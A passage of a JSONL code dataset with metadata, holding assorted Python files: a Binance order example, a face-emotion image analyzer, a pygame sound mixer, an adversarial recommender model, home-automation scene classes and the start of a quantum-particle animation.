"views.world_partners", "line_number": 25, "usage_type": "argument"}, {"api_name": "django.conf.urls.url", "line_number": 26, "usage_type": "call"}, {"api_name": "views.export_excel", "line_number": 26, "usage_type": "argument"}, {"api_name": "django.conf.urls.url", "line_number": 27, "usage_type": "call"}, {"api_name": "views.recommendations", "line_number": 27, "usage_type": "argument"}]} +{"seq_id": "231488189", "text": "from binance.spot import Spot as REST\n\nclient = REST()\norder = {\n 'symbol': 'BTCUSDT',\n 'side': 'SELL',\n 'type': 'LIMIT',\n 'timeInForce': 'GTC',\n 'quantity': 0.002,\n 'price': 9500\n}\nresponse = client.new_order(**order)\nprint(response)\n", "sub_path": "examples/exchanges/binance_rest.py", "file_name": "binance_rest.py", "file_ext": "py", "file_size_in_byte": 253, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "binance.spot.Spot", "line_number": 3, "usage_type": "call"}]} +{"seq_id": "536723311", "text": "# -*- coding: utf-8 -*-\n\nimport json\nimport gzip\n\nfilepath = \"../data/jawiki-country.json.gz\"\nwith gzip.open(filepath, 'rb') as f:\n for line in f:\n obj = json.loads(line.decode('utf-8'))\n if obj['title'] == 'イギリス':\n print(obj['text'])", "sub_path": "takahashi/chapter03/knock20.py", "file_name": "knock20.py", "file_ext": "py", "file_size_in_byte": 270, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "gzip.open", "line_number": 7, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 9, "usage_type": "call"}]} +{"seq_id": "651259843", "text": "import io\n\nfrom googleCVWrapper import GoogleCVWrapper\nfrom PIL import Image, ImageDraw\n\nclass ImageAnalyzer:\n\n def __init__(self, imagePath=\"\"):\n self.googleCV = GoogleCVWrapper()\n\n self.imagePath = imagePath\n\n self.maxNumberOfFaces = 100\n\n self.emotions = []\n if len(self.imagePath) > 0:\n with open(self.imagePath, 'rb') as image:\n self.faceAnnotations = self.googleCV.detect_face(image, self.maxNumberOfFaces)\n self.loadEmotions()\n\n\n def loadImage(self, imagePath):\n self.imagePath = imagePath\n self.emotions = []\n with open(self.imagePath, 'rb') as image:\n self.faceAnnotations = self.googleCV.detect_face(image, self.maxNumberOfFaces)\n\n def highlight_faces(self, image, faces, outputFilename):\n \"\"\"Draws a polygon around the faces, then saves to output_filename.\n\n Args:\n image: a file containing the image with the faces.\n faces: a list of faces found in the file. This should be in the format\n returned by the Vision API.\n output_filename: the name of the image file to be created, where the\n faces have polygons drawn around them.\n \"\"\"\n im = Image.open(image)\n draw = ImageDraw.Draw(im)\n\n for face in faces:\n box = [(vertex.x, vertex.y)\n for vertex in face.bounding_poly.vertices]\n draw.line(box + [box[0]], width=5, fill='#00ff00')\n\n im.save(outputFilename)\n\n def markFaces(self, image, outputFilename):\n image.seek(0)\n self.highlight_faces(image, self.faceAnnotations, outputFilename)\n\n\n def totalNumberOfPeopleInImage(self):\n return len(self.faceAnnotations)\n\n def isFaceLookingAtCamera(self, rollAngle, panAngle, tiltAngle):\n if rollAngle >= -30 and rollAngle <= 30 and panAngle >= -30 and panAngle <= 30:\n return True\n\n return False\n \n def numberOfPeopleLookingAtCamera(self):\n \n count = 0\n\n for annotation in self.faceAnnotations:\n rollAngle = annotation.rollAngle\n panAngle = annotation.panAngle\n tiltAngle = annotation.tiltAngle\n\n if self.isFaceLookingAtCamera(rollAngle, panAngle, tiltAngle):\n count += 1\n\n return count\n\n def loadEmotions(self):\n \n \"\"\"\n This function uses self.faceAnnotations to determine emotions,\n a list of tuples of the form (joy, sorrow, anger, surprise),\n expressing each emotions likelihood for each face\n \"\"\"\n\n emotions = []\n\n for annotation in self.faceAnnotations:\n joy = annotation.joy_likelihood\n sorrow = annotation.sorrow_likelihood\n anger = annotation.anger_likelihood\n surprise = annotation.surprise_likelihood\n\n emotions.append((joy, sorrow, anger, surprise))\n\n self.emotions = emotions \n \n\n def numberOfJoyfulPeople(self):\n count = 0\n for emotionTuple in self.emotions:\n if emotionTuple[0] > 3:\n count += 1\n return count\n\n def numberOfSorrowfulPeople(self):\n count = 0\n for emotionTuple in self.emotions:\n if emotionTuple[1] > 3:\n count += 1\n return count\n\n def numberOfAngryPeople(self):\n count = 0\n for emotionTuple in self.emotions:\n if emotionTuple[2] > 3:\n count += 1\n return count\n\n def numberOfSurprisedPeople(self):\n count = 0\n for emotionTuple in self.emotions:\n if emotionTuple[3] > 3:\n count += 1\n return count\n\n\n def numberOfEmotionallyActivePeople(self):\n for face in self.emotions:\n joy = face[0]\n sorrow = face[1]\n anger = face[2]\n surprise = face[3]\n\n return self.numberOfJoyfulPeople() + self.numberOfSorrowfulPeople() + self.numberOfSurprisedPeople() + self.numberOfAngryPeople()\n\n", "sub_path": "ImageAnalyzer.py", "file_name": "ImageAnalyzer.py", "file_ext": "py", "file_size_in_byte": 4044, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "googleCVWrapper.GoogleCVWrapper", "line_number": 9, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 38, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 38, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 39, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 39, "usage_type": "name"}]} +{"seq_id": "646175447", "text": "import pygame as pg\n\npg.mixer.init()\n\nclass Mezclador():\n def __init__(self):\n self.playList = [pg.mixer.music.load(\"./sonidos/rock1.ogg\"),\n pg.mixer.music.load(\"./sonidos/rock2.ogg\"),\n pg.mixer.music.load(\"./sonidos/rock3.ogg\")]\n self.musicMenu = pg.mixer.Sound(\"./sonidos/menu.ogg\")\n self.musicHistoria = pg.mixer.Sound(\"./sonidos/historia.ogg\")\n self.sonidoClick = pg.mixer.Sound('./sonidos/Click.ogg')\n self.grunt = pg.mixer.Sound('./sonidos/grunt.ogg')\n self.flagMenu = True\n self.flagMudo = False\n self.flagHistoria = True\n self.conPlayList = 0\n\n def update(self,estados):\n self.menu(estados)\n self.historia(estados)\n self.musica(estados)\n\n def menu(self,estados):\n if self.flagMudo:\n self.musicMenu.stop()\n self.flagMenu = True\n elif estados[\"inicio\"] and not self.flagMudo and self.flagMenu:\n self.musicMenu.play(-1)\n self.flagMenu = False\n elif not estados[\"inicio\"]:# and not self.flagMenu:\n self.musicMenu.stop()\n self.flagMenu = True\n\n def historia(self,estados):\n if self.flagMudo:\n self.musicHistoria.stop()\n self.flagHistoria = True\n elif estados[\"historia\"] and not self.flagMudo and self.flagHistoria:\n self.musicHistoria.play(-1)\n self.flagHistoria = False\n elif not estados[\"historia\"]:# and not self.flagMenu:\n self.musicHistoria.stop()\n self.flagHistoria = True\n\n def click(self):\n self.sonidoClick.play()\n\n def grunt(self):\n self.grunt.play()\n\n def musica(self,estados):\n if estados[\"nivel1\"] or estados[\"nivel2\"]:\n if not self.flagMudo:\n if pg.mixer.music.get_busy() == 0: #1 es sonando y 0 es sin sonido\n self.playList[self.nextSong()]\n pg.mixer.music.play()\n elif estados[\"inicio\"]:\n pg.mixer.music.stop()\n\n def nextSong(self):\n if self.conPlayList < len(self.playList):\n self.conPlayList += 1\n else:\n self.conPlayList = 0\n return (self.conPlayList - 1)\n\n def mudo(self):\n if not self.flagMudo:\n self.flagMudo = True\n print(\"apagado\")\n else:\n self.flagMudo = False\n print(\"encendido\")\n\n def getMudo(self):\n return self.flagMudo\n", "sub_path": "sonidos/sonidos.py", "file_name": "sonidos.py", "file_ext": "py", "file_size_in_byte": 2498, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "pygame.mixer.init", "line_number": 3, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 3, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.load", "line_number": 7, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 7, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.load", "line_number": 8, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 8, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.load", "line_number": 9, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 9, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 10, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 10, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 11, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 11, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 12, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 12, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 13, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 13, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.get_busy", "line_number": 55, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 55, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.play", "line_number": 57, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 57, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.stop", "line_number": 59, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 59, "usage_type": "attribute"}]} +{"seq_id": "485424395", "text": "\"\"\"\nPaper: Adversarial Personalized Ranking for Recommendation\nAuthor: Xiangnan He, Zhankui He, Xiaoyu Du and Tat-Seng Chua\nReference: https://github.com/hexiangnan/adversarial_personalized_ranking\n\"\"\"\n\nfrom model.base import AbstractRecommender\nimport tensorflow as tf\nimport numpy as np\nfrom utils.tools import csr_to_user_dict, csr_to_pairwise\nfrom utils import DataIterator\nfrom utils.tools import timer\nfrom modules import inner_product, log_loss\nfrom tensorflow.python.keras.layers import Embedding\n\n\n# prediction model\nclass APR(AbstractRecommender):\n def __init__(self, config):\n super(APR, self).__init__(config)\n train_matrix = self.dataset.train_matrix\n self.num_users, self.num_items = train_matrix.shape\n\n self.embedding_size = config[\"embed_size\"]\n self.learning_rate = config[\"lr\"]\n self.batch_size = config[\"batch_size\"]\n self.reg = config[\"reg\"]\n self.dns = config[\"dns\"]\n self.adv = config[\"adv\"]\n self.eps = config[\"eps\"]\n self.adv_epoch = config[\"adv_epoch\"]\n self.reg_adv = config[\"reg_adv\"]\n self.epochs = config[\"epochs\"]\n self.train_matrix = train_matrix\n\n self.user_pos_train = csr_to_user_dict(train_matrix)\n\n self.all_items = np.arange(self.num_items)\n self.build_model()\n self.sess.run(tf.global_variables_initializer())\n\n def _create_placeholders(self):\n with tf.name_scope(\"input_data\"):\n self.user_input = tf.placeholder(tf.int32, shape=[None], name=\"user_input\")\n self.item_input_pos = tf.placeholder(tf.int32, shape=[None], name=\"item_input_pos\")\n self.item_input_neg = tf.placeholder(tf.int32, shape=[None, None], name=\"item_input_neg\")\n self.steps = tf.placeholder(tf.int32, name=\"epoch\")\n steps = tf.cast(self.steps, dtype=tf.float32)\n self.growth = 2 * tf.sigmoid(steps / 10.0) - 1 # increase the adversarial perturbations gradually\n\n def _create_variables(self):\n with tf.name_scope(\"embedding\"):\n regularizer = tf.keras.regularizers.l2(self.reg)\n # embedding layers\n emb_P_init = tf.keras.initializers.truncated_normal(mean=0.0, stddev=0.01)\n self.emb_P_layer = Embedding(self.num_users, self.embedding_size,\n embeddings_initializer=emb_P_init,\n embeddings_regularizer=regularizer)\n\n emb_Q_init = tf.keras.initializers.truncated_normal(mean=0.0, stddev=0.01)\n self.emb_Q_layer = Embedding(self.num_items, self.embedding_size,\n embeddings_initializer=emb_Q_init,\n embeddings_regularizer=regularizer)\n\n self.delta_P_layer = Embedding(self.num_users, self.embedding_size,\n embeddings_initializer=tf.keras.initializers.zeros(),\n trainable=False)\n\n self.delta_Q_layer = Embedding(self.num_items, self.embedding_size,\n embeddings_initializer=tf.keras.initializers.zeros(),\n trainable=False)\n\n def _create_loss(self):\n with tf.name_scope(\"loss\"):\n # loss for L(Theta)\n # get embedding\n embedding_p = self.emb_P_layer(self.user_input) # (b, embedding_size)\n embedding_q_pos = self.emb_Q_layer(self.item_input_pos) # (b, embedding_size)\n embedding_q_neg = self.emb_Q_layer(self.item_input_neg) # (b, ?, embedding_size)\n\n output_pos = inner_product(embedding_p, embedding_q_pos) # (b,)\n embedding_p_tmp = tf.expand_dims(embedding_p, axis=1) # (b, 1, embedding_size)\n outputs_neg = inner_product(embedding_p_tmp, embedding_q_neg) # (b, ?)\n output_neg = tf.reduce_max(outputs_neg, axis=-1) # (b,)\n\n # bpr loss\n yij = tf.clip_by_value(output_pos - output_neg, -80.0, 1e8)\n self.bpr_loss = tf.reduce_sum(log_loss(yij))\n\n # loss for L(Theta + adv_Delta)\n # Note that the number of negative item is 1 while adversarial training.\n delta_p = self.delta_P_layer(self.user_input) # (b, embedding_size)\n delta_q_pos = self.delta_Q_layer(self.item_input_pos) # (b, embedding_size)\n delta_q_neg = tf.squeeze(self.delta_Q_layer(self.item_input_neg)) # (b, embedding_size)\n # perturbed embedding\n p_plus_delta = embedding_p + delta_p\n pos_q_plus_delta = embedding_q_pos + delta_q_pos\n neg_q_plus_delta = tf.squeeze(embedding_q_neg) + delta_q_neg\n # perturbed predict\n adv_output_pos = inner_product(p_plus_delta, pos_q_plus_delta)\n adv_output_neg = inner_product(p_plus_delta, neg_q_plus_delta)\n\n # adversarial loss\n adv_yij = tf.clip_by_value(adv_output_pos - adv_output_neg, -80.0, 1e8)\n adv_loss = tf.reduce_sum(log_loss(adv_yij))\n self.amf_loss = self.bpr_loss + self.growth * self.reg_adv * adv_loss\n\n self.embedding_P = self.emb_P_layer.weights[0]\n self.embedding_Q = self.emb_Q_layer.weights[0]\n self.delta_P = self.delta_P_layer.weights[0]\n self.delta_Q = self.delta_Q_layer.weights[0]\n\n def _create_adversarial(self):\n with tf.name_scope(\"adversarial\"):\n # generate the adversarial weights by random method\n if self.adv == \"random\":\n # generation\n self.adv_P = tf.truncated_normal(shape=[self.num_users, self.embedding_size], mean=0.0, stddev=0.01)\n self.adv_Q = tf.truncated_normal(shape=[self.num_items, self.embedding_size], mean=0.0, stddev=0.01)\n\n # normalization and multiply epsilon\n self.update_P = self.delta_P.assign(tf.nn.l2_normalize(self.adv_P, 1) * self.eps * self.growth)\n self.update_Q = self.delta_Q.assign(tf.nn.l2_normalize(self.adv_Q, 1) * self.eps * self.growth)\n\n # generate the adversarial weights by gradient-based method\n elif self.adv == \"grad\":\n # return the IndexedSlice Data: [(values, indices, dense_shape)]\n # grad_var_P: [grad,var], grad_var_Q: [grad, var]\n self.grad_P, self.grad_Q = tf.gradients(self.bpr_loss, [self.embedding_P, self.embedding_Q])\n\n # convert the IndexedSlice Data to Dense Tensor\n self.grad_P_dense = tf.stop_gradient(self.grad_P)\n self.grad_Q_dense = tf.stop_gradient(self.grad_Q)\n\n # normalization: new_grad = (grad / |grad|) * eps\n self.update_P = self.delta_P.assign(tf.nn.l2_normalize(self.grad_P_dense, 1) * self.eps * self.growth)\n self.update_Q = self.delta_Q.assign(tf.nn.l2_normalize(self.grad_Q_dense, 1) * self.eps * self.growth)\n\n def _create_optimizer(self):\n with tf.name_scope(\"optimizer\"):\n self.bpr_optimizer = tf.train.AdagradOptimizer(learning_rate=self.learning_rate).minimize(self.bpr_loss)\n self.amf_optimizer = tf.train.AdagradOptimizer(learning_rate=self.learning_rate).minimize(self.amf_loss)\n\n def build_model(self):\n self._create_placeholders()\n self._create_variables()\n self._create_loss()\n self._create_optimizer()\n self._create_adversarial()\n\n def train_model(self):\n self._pre_training()\n self._adversarial_training()\n\n def _pre_training(self):\n # pretrain\n self.logger.info(\"Pre-training\")\n for epoch in range(self.adv_epoch):\n users, pos_items, neg_items = csr_to_pairwise(self.train_matrix, neg_num=self.dns, fold_neg=True)\n data = DataIterator(users, pos_items, neg_items, batch_size=self.batch_size, shuffle=True)\n for user_input, item_input_pos, item_dns_list in data:\n feed_dict = {self.user_input: user_input,\n self.item_input_pos: item_input_pos,\n self.item_input_neg: item_dns_list}\n self.sess.run(self.bpr_optimizer, feed_dict)\n\n result = self.evaluate_model()\n self.logger.info(\"%d:\\t%s\" % (epoch, result))\n\n def _adversarial_training(self):\n # adversarial training\n self.logger.info(\"Adversarial training\")\n for epoch in range(self.adv_epoch, self.epochs):\n users, pos_items, neg_items = csr_to_pairwise(self.train_matrix, neg_num=1, fold_neg=True)\n data = DataIterator(users, pos_items, neg_items, batch_size=self.batch_size, shuffle=True)\n for user_input, item_input_pos, item_input_neg in data:\n feed_dict = {self.user_input: user_input,\n self.item_input_pos: item_input_pos,\n self.item_input_neg: item_input_neg,\n self.steps: epoch}\n\n self.sess.run([self.update_P, self.update_Q], feed_dict)\n self.sess.run(self.amf_optimizer, feed_dict)\n\n result = self.evaluate_model()\n self.logger.info(\"%d:\\t%s\" % (epoch, result))\n\n def evaluate_model(self):\n self.user_embedding_eval, self.item_embedding_eval = self.sess.run([self.embedding_P, self.embedding_Q])\n result = self.evaluator.evaluate(self)\n buf = '\\t'.join([str(x) for x in result])\n return buf\n\n def predict_for_eval(self, users):\n user_embedding = self.user_embedding_eval[users]\n item_embedding = self.item_embedding_eval\n ratings = np.matmul(user_embedding, item_embedding.T)\n return ratings\n", "sub_path": "model/APR.py", "file_name": "APR.py", "file_ext": "py", "file_size_in_byte": 9779, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "model.base.AbstractRecommender", "line_number": 18, "usage_type": "name"}, {"api_name": "utils.tools.csr_to_user_dict", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 38, "usage_type": "call"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 40, "usage_type": "call"}, {"api_name": "tensorflow.name_scope", "line_number": 43, "usage_type": "call"}, {"api_name": "tensorflow.placeholder", "line_number": 44, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 44, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 45, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 45, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 46, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 46, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 47, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 47, "usage_type": "attribute"}, {"api_name": "tensorflow.cast", "line_number": 48, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 48, "usage_type": "attribute"}, {"api_name": "tensorflow.sigmoid", "line_number": 49, "usage_type": "call"}, {"api_name": "tensorflow.name_scope", "line_number": 52, "usage_type": "call"}, {"api_name": "tensorflow.keras.regularizers.l2", "line_number": 53, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 53, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.initializers.truncated_normal", "line_number": 55, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 55, "usage_type": "attribute"}, {"api_name": "tensorflow.python.keras.layers.Embedding", "line_number": 56, "usage_type": "call"}, {"api_name": "tensorflow.keras.initializers.truncated_normal", "line_number": 60, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 60, "usage_type": "attribute"}, {"api_name": "tensorflow.python.keras.layers.Embedding", "line_number": 61, "usage_type": "call"}, {"api_name": "tensorflow.python.keras.layers.Embedding", "line_number": 65, "usage_type": "call"}, {"api_name": "tensorflow.keras.initializers.zeros", "line_number": 66, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 66, "usage_type": "attribute"}, {"api_name": "tensorflow.python.keras.layers.Embedding", "line_number": 69, "usage_type": "call"}, {"api_name": "tensorflow.keras.initializers.zeros", "line_number": 70, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 70, "usage_type": "attribute"}, {"api_name": "tensorflow.name_scope", "line_number": 74, "usage_type": "call"}, {"api_name": "modules.inner_product", "line_number": 81, "usage_type": "call"}, {"api_name": "tensorflow.expand_dims", "line_number": 82, "usage_type": "call"}, {"api_name": "modules.inner_product", "line_number": 83, "usage_type": "call"}, {"api_name": "tensorflow.reduce_max", "line_number": 84, "usage_type": "call"}, {"api_name": "tensorflow.clip_by_value", "line_number": 87, "usage_type": "call"}, {"api_name": "tensorflow.reduce_sum", "line_number": 88, "usage_type": "call"}, {"api_name": "modules.log_loss", "line_number": 88, "usage_type": "call"}, {"api_name": "tensorflow.squeeze", "line_number": 94, "usage_type": "call"}, {"api_name": "tensorflow.squeeze", "line_number": 98, "usage_type": "call"}, {"api_name": "modules.inner_product", "line_number": 100, "usage_type": "call"}, {"api_name": "modules.inner_product", "line_number": 101, "usage_type": "call"}, {"api_name": "tensorflow.clip_by_value", "line_number": 104, "usage_type": "call"}, {"api_name": "tensorflow.reduce_sum", "line_number": 105, "usage_type": "call"}, {"api_name": "modules.log_loss", "line_number": 105, "usage_type": "call"}, {"api_name": "tensorflow.name_scope", "line_number": 114, "usage_type": "call"}, {"api_name": "tensorflow.truncated_normal", "line_number": 118, "usage_type": "call"}, {"api_name": "tensorflow.truncated_normal", "line_number": 119, "usage_type": "call"}, {"api_name": "tensorflow.nn.l2_normalize", "line_number": 122, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 122, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.l2_normalize", "line_number": 123, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 123, "usage_type": "attribute"}, {"api_name": "tensorflow.gradients", "line_number": 129, "usage_type": "call"}, {"api_name": "tensorflow.stop_gradient", "line_number": 132, "usage_type": "call"}, {"api_name": "tensorflow.stop_gradient", "line_number": 133, "usage_type": "call"}, {"api_name": "tensorflow.nn.l2_normalize", "line_number": 136, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 136, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.l2_normalize", "line_number": 137, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 137, "usage_type": "attribute"}, {"api_name": "tensorflow.name_scope", "line_number": 140, "usage_type": "call"}, {"api_name": "tensorflow.train.AdagradOptimizer", "line_number": 141, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 141, "usage_type": "attribute"}, {"api_name": "tensorflow.train.AdagradOptimizer", "line_number": 142, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 142, "usage_type": "attribute"}, {"api_name": "utils.tools.csr_to_pairwise", "line_number": 159, "usage_type": "call"}, {"api_name": "utils.DataIterator", "line_number": 160, "usage_type": "call"}, {"api_name": "utils.tools.csr_to_pairwise", "line_number": 174, "usage_type": "call"}, {"api_name": "utils.DataIterator", "line_number": 175, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 197, "usage_type": "call"}]} +{"seq_id": "574228335", "text": "from threading import Thread, Event, RLock\nfrom datetime import datetime\nfrom time import sleep\nfrom homedaemon.bus import Bus\nfrom homedaemon.logger import Logger\nfrom homedaemon.devices import Devices\nfrom typing import Dict, Any, List, Set, Callable\nfrom pyiot.software import Time\n\n\n\nclass SceneInterface:\n def __init__(self, sid:str):\n self.sid = sid\n self.bus = Bus()\n self.devices = Devices()\n self.logger = Logger()\n self.name = ''\n self.model = ''\n self.place = ''\n self.running: Set[Callable[[], None]] = set()\n self.lock = RLock()\n \n def _runner(self, handler: Callable[[], None], *args:Any) -> None:\n with self.lock:\n self.logger.debug(f'Scene {self.name} running list {self.running} {handler}')\n if handler in self.running:\n self.logger.warning(f'Scene {self.name}: {handler.__name__} allready started')\n return\n else:\n self.running.add(handler)\n self.bus.emit(f'report.{self.sid}.status.on', f'Scene {self.name}: {handler.__name__} start')\n \n try:\n handler()\n except Exception as err:\n self.logger.error(f'scene running error {self.name} {err}')\n finally: \n self.bus.emit(f'report.{self.sid}.status.off', f'Scene {self.name}: {handler.__name__} end')\n self.running.remove(handler)\n \n def sleep(self, s:int):\n sleep(s)\n\n def get_device(self, sid:str):\n return self.devices.get(sid)\n\n def store_device_state(self, *sids:str):\n pass\n \n def restore_devices_state(self, *sids:str):\n pass\n \n def device_status(self) -> Dict[str,Any]:\n ret = {'status': 'off',\n 'sid': self.sid,\n 'name': self.name,\n 'place': self.place}\n if self.running:\n events :List[str] = [x.__name__ for x in self.running]\n ret['status'] = 'on'\n ret['events'] = events\n return ret\n \n def now(self):\n \"\"\"Retrun time now\"\"\"\n return datetime.now().time()\n \n\nclass BaseScene(SceneInterface):\n def __init__(self, sid:str):\n super().__init__(sid)\n self.reversible = False\n self.model = 'scene'\n self.bus.add_trigger(f'write.{self.sid}.status.on', self._on, self.on)\n self.bus.add_trigger(f'write.{self.sid}.status.off',self._off, self.off)\n \n def _on(self):\n if self.on in self.running:\n self.logger.warning(f'Scene {self.name} allready started')\n else:\n self.running.add(self.on)\n self.bus.emit(f'report{self.sid}.status.on', f'Scene {self.name}: on')\n try:\n self.on()\n # sc = Thread(name=self.name, target=self.on)\n # sc.start()\n except Exception as err:\n self.logger.error(f'scene running error {self.name} {err}')\n finally:\n if not self.reversible:\n self.bus.emit(f'report{self.sid}.status.off', f'Scene {self.name}: off')\n \n def on(self):\n pass\n \n def _off(self):\n if not self.reversible or not self.on in self.running:\n return\n try:\n self.off()\n # sc = Thread(name=self.name, target=self.off)\n # sc.start()\n except Exception as err:\n self.logger.error(f'scene running error {self.name} {err}')\n finally:\n self.bus.emit(f'report{self.sid}.status.off', f'Scene {self.name}: off')\n # self.running = False\n \n def off(self):\n pass\n\n \nclass BaseAutomation(SceneInterface):\n def __init__(self, sid:str):\n super().__init__(sid) \n self.model = 'automation'\n \n def add_trigger(self, trigger:str, handler:Callable[[], None]) -> None:\n self.bus.add_trigger(trigger, self._runner, handler)\n\n\nclass RunAfter:\n def __init__(self, delay:int, callback: Callable[[], None], *args: Any):\n self.delay = delay\n self.callback = callback\n self.args = args\n self.ev = Event()\n self._is_waiting = False\n \n def wait(self):\n Thread(target=self._wait, daemon=True).start()\n \n def _wait(self):\n self.ev.clear()\n self._is_waiting = True\n if not self.ev.wait(timeout=self.delay):\n if self.args:\n self.callback(*self.args)\n else:\n self.callback()\n else:\n print('canceled')\n \n @property\n def is_waiting(self):\n return self._is_waiting\n \n def cancel(self):\n self.ev.set()\n self._is_waiting = False\n \nclass TimeRange:\n \"\"\"TimeRange\"\"\"\n def __init__(self, _from: Time, _to: Time):\n self._from = _from\n self._to = _to\n \n def __contains__(self, value: Time):\n if value > self._to:\n return self._from <= value >= self._to\n elif value < self._to:\n return self._from >= value <= self._to\n", "sub_path": "homedaemon/scenes.py", "file_name": "scenes.py", "file_ext": "py", "file_size_in_byte": 5136, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "homedaemon.bus.Bus", "line_number": 15, "usage_type": "call"}, {"api_name": "homedaemon.devices.Devices", "line_number": 16, "usage_type": "call"}, {"api_name": "homedaemon.logger.Logger", "line_number": 17, "usage_type": "call"}, {"api_name": "typing.Set", "line_number": 21, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 21, "usage_type": "name"}, {"api_name": "threading.RLock", "line_number": 22, "usage_type": "call"}, {"api_name": "typing.Callable", "line_number": 24, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 24, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 43, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 60, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 54, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 54, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 67, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 67, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 119, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 124, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 124, "usage_type": "name"}, {"api_name": "threading.Event", "line_number": 128, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 132, "usage_type": "call"}, {"api_name": "pyiot.software.Time", "line_number": 155, "usage_type": "name"}, {"api_name": "pyiot.software.Time", "line_number": 159, "usage_type": "name"}]} +{"seq_id": "218938436", "text": "import logging\n\nfrom .core.manager import Manager\nfrom .ui.qt5.mainwindow import MainWindow\n\nlogging.basicConfig(level=logging.INFO,\n format='%(asctime)s %(name)s %(threadName)-s %(levelname)s: %(message)s',\n datefmt=\"%Y-%m-%d %H:%M:%S\")\n\n\nclass Main:\n def __init__(self):\n self.ui = MainWindow(Manager())\n\n\nif __name__ == \"__main__\":\n Main()\n", "sub_path": "sample/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 394, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "logging.basicConfig", "line_number": 6, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 6, "usage_type": "attribute"}, {"api_name": "ui.qt5.mainwindow.MainWindow", "line_number": 13, "usage_type": "call"}, {"api_name": "core.manager.Manager", "line_number": 13, "usage_type": "call"}]} +{"seq_id": "431916486", "text": "import numpy as np\r\nfrom matplotlib import pyplot as plt\r\nfrom matplotlib import animation\r\n\r\n\r\n\r\n# First set up the figure, the axis, and the plot element we want to animate\r\nfig = plt.figure()\r\nax = plt.axes(xlim=(0, 500), ylim=(-0.3, 0.3))\r\nline, = ax.plot([], [], lw=2)\r\n\r\n\r\n\r\ndef PIB_Func(x, n, L):\r\n return np.sqrt(2/L)*np.sin(n*np.pi*x/L)\r\n\r\ndef Gauss_Packet(sig,x, x0, k0):\r\n ci = 0 + 1j\r\n pre = 1/(sig*np.sqrt(2*np.pi))\r\n 